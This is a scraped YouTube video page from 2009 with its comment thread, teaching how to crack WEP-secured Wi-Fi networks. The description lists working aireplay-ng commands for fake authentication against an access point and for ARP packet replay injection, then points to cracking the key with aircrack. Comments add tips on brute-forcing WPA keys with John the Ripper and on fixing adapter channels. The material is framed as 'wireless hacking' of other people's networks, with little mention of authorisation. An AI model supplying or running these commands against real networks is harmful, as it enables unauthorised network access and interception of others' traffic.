Authenticate with Secured Networks and generate ARPs - Fake Authentication/Interactive Packet Replay

16,500

Sign in or sign up now!

Uploaded by mushroomHEADBANGERS on Dec 21, 2009

This video demonstrates a wireless hacking technique that can be used when no computers are on a network, no ARP Packets are being broadcasted, and Data-Flow (IV Sniffing) is going very slowly when hacking a wireless network. The techniques are incorporated with Aireplay-ng and are called Fake Authentication and Interfactive Packet Replay.

This video is made for those that have already watched my or someone else's wireless hacking video and understand the basic concepts and have either a Backtrack Live-CD or Virtual Machine (Or another Linux distro with Airmon-ng installed).

- Commands Used (Specific to Fake Authentication and Interactive Packet Replay)

macchanger -s wlan0
(Displays the Mac Address for my network interface. Please note that your interface may be called something else)

aireplay-ng -1 3000 -e [ESSID - Name of Network] -a [Mac Address of the Access Point] -h [Our systems Mac Address displayed in Macchanger] -o 1 -q 10 wlan0
(This is the command for Fake Authentication which basically tricks the Access Point into thinking your a legit system on the network allowing additional techniques to be applied. Once again your interface name may differ)

aireplay-ng -2 -b 00:1C:10:15:D3:B8 -h 00:15:af:01:9b:1c -c FF:FF:FF:FF:FF:FF -p 0841 wlan0
(This will be the command for Interactive Packet Replay which allows you to collect packets and once obtained, replay (inject) the packets allowing Data/IV's to collected much faster

After this you can proceed with the airodump-ng as usual in the other Shell Konsole and crack as usual.

Category:

Howto & Style

License:

Standard YouTube License

45 likes, 3 dislikes

Uploader Comments (mushroomHEADBANGERS)

i know this is not the right vid to comment on wpa but i will first of all when a wpa,key is for ex.6t7eg7dh00e8he7 how would it be possible to get this key is the only option brute force???? if it is can u please make a vid or is this unrealistic of me to ask you to do this because i have heard this can take days love ur other vids.

danoxx2

danoxx2 1 year ago
Their are two types of Brute-Forcing. True brute forcing basically means that you try every possible combination of characters (With rules in place to restrict size, letters, etc..) which can take a very long time depending on the rules in place. By long time I mean over a year in some cases :P

The other variant is utilizing wordlists which in your case would prove worthless. However, you can incorporate the two by using John The Ripper. It allows you to add extra characters and so forth.

mushroomHEADBANGERS 1 year ago
Hi all when I get to this bit:

aireplay-ng -1 3000 -e [ESSID - Name of Network] -a [Mac Address of the Access Point] -h [Our systems Mac Address displayed in Macchanger] -o 1 -q 10 wlan0

and hit enter it trys to work but dose not use the correct channel insted of using channel 6 it uses 9 and then gives the an error of incorect bssid

the bssid is correct as to are the mac and router numbers.

any idea thanks

696reavers 1 year ago
Sorry for the late reply, I've been AFK. You can change your channel by doing this:

airmon-ng stop [ADAPTER] check kill

airmon-ng [ADAPTER] start 6

And you can also try this if you have issues with the above mentioned:

iwconfig [ADAPTER] channel 6

mushroomHEADBANGERS 1 year ago

Video Responses

This video is a response to How To Hack Wireless Networks (WEP - Windows/Linux) - Part 2

see all

All Comments (183)

nice tutorial man thanks a lot !!!!

SuperHighlander1996 3 months ago
Thnx for this great tutorial!

I got the packets send, but aircrack doesn't find the key (even after 600.000+ data)

I tested this on my own network with no computer attached (no wirless and no wired).

What i am doing wrong? I followed all your steps above!

arnoud106 4 months ago
You rock !!!!! and by the way r there any more bt tutorials of urs ?????

kt19961996 7 months ago
When I run interactive packet replay - it stops after ~10 packets... Is there a way to make it run longer to collect more packets?

irefrem 8 months ago
HOW DO YOU CHECK TO SEE IF MAC address filtering is enabled

LilJProductionz2011 10 months ago
HOW DO YOU LOWER TRANSMIT RATE???????????

LilJProductionz2011 10 months ago
Fake Authentication failed on me too, i checked everything to be correct (used the right channel and macs) and no results, it just keeps sending "Sending Authentication Request (Open System)".

I also used the "check kill" to restart my adapter to the right channel and it didn't work :(

wedingo 10 months ago
when im trying to do the intreractive packet replay it just keep saying read (packets number) packets and it already went up to 98,000 packets and keep going for like 10 minutes already

xxxxfatcatxxxx 11 months ago
@tayjay1983 its not -9 10 its -q 10

xXCyrax002Xx 11 months ago
I am capturing data packets really slowly so i tried ur first option but when i put it in this is what i get out:

21:37:29 Sending Authentication Request (Open System)

21:37:31 Sending Authentication Request (Open System)

21:37:33 Sending Authentication Request (Open System)

21:37:35 Sending Authentication Request (Open System)

21:37:37 Sending Authentication Request (Open System)

until it stops i know i put the correct info in but this still happens any ideas?

xXCyrax002Xx 11 months ago

Authenticate with Secured Networks and generate ARPs - Fake Authentication/Interactive Packet Replay

Category:

Tags:

License:

Link to this comment:

Uploader Comments (mushroomHEADBANGERS)

Video Responses

All Comments (183)